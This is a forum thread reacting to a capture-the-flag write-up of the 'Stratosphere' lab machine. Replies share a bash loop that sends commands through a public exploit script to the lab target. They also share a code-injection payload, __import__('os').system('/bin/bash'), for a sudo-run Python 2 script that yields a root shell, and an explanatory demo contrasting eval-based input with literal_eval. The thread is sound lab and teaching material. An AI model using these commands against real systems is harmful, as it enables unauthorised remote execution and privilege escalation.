Stratosphere write-up

Hope you like it. Enjoy!

Great writeup :+1:
I followed almost the same route, but in order to make the filesystem enumeration process a bit easier, I wrote a small script to make things easier:

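```bash
#!/bin/bash
# Prompt for a command and pass it to the PoC script (41570.py) with the target URL.

url='http://10.10.10.64/Monitoring/example/Welcome.action'

# read -p is a bash feature, hence the bash shebang; the loop ends on EOF (Ctrl-D).
while read -r -p '[cmd]: ' cmd ; do
    if [ -n "$cmd" ]
    then
        python 41570.py "$url" "$cmd" | while IFS= read -r line ; do
            echo "$line"
        done
    fi
done
```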

It is still a non-interactive shell, but at least it is easier than typing the above command :slight_smile:
BTW this was my favorite box so far!!

I found another way to get root, as the PoC found here:

If we insert this command in the very first question:

`__import__('os').system('/bin/bash')`

we get a root shell, but only if we execute it with version 2 of Python:

`sudo /usr/bin/python2 /home/richard/test.py`

@paciock said:
I found another way to get root, as the PoC found here:

Python Exploitation #1: Input(). This weeks topic 22/2/15: Input() | by Dor Rondel | Medium

If we insert this command in the very first question:

`__import__('os').system('/bin/bash')`

we get a root shell, but only if we execute it with version 2 of Python:

`sudo /usr/bin/python2 /home/richard/test.py`

That's because input = eval(raw_input) in python2
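The behaviour this reply describes, shown next to a data-only reader, as an added example that is not part of the thread or of the box's `test.py`. It runs on Python 3 and emulates Python 2's `input()` with `eval()`; the names `py2_input`, `data_only_input`, `ask`, `SIDE_EFFECTS` and the expected answer 42 are constructed for illustration.

```python
import ast
import io

SIDE_EFFECTS = []  # constructed marker: records whether typed text ran as code


def py2_input(stream):
    """Emulate Python 2's input(): eval() the raw line as an expression."""
    return eval(stream.readline().rstrip("\n"))  # unsafe on purpose


def data_only_input(stream):
    """Hardened reader: accept Python literals only, otherwise keep the text."""
    line = stream.readline().rstrip("\n")
    try:
        return ast.literal_eval(line)  # parses 42, 'abc', [1, 2]; never calls code
    except (ValueError, SyntaxError):
        return line  # expressions and calls stay inert strings


def ask(reader, typed, expected=42):
    """Feed one constructed answer to a reader; report (value, accepted)."""
    value = reader(io.StringIO(typed + "\n"))
    return value, value == expected


if __name__ == "__main__":
    # Constructed answers: a literal, an expression, an expression with a side effect.
    for typed in ["42", "6 * 7", "SIDE_EFFECTS.append('ran') or 42"]:
        for reader in (py2_input, data_only_input):
            SIDE_EFFECTS.clear()
            value, ok = ask(reader, typed)
            print(f"{reader.__name__:16} {typed!r:38} -> {value!r:38} "
                  f"accepted={ok} code_ran={bool(SIDE_EFFECTS)}")
```

In Python 2 the data-only behaviour comes from `raw_input()`; in Python 3, `input()` already returns the typed text as a string without evaluating it.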

Thanks guys,
Those are nice ways too :slight_smile: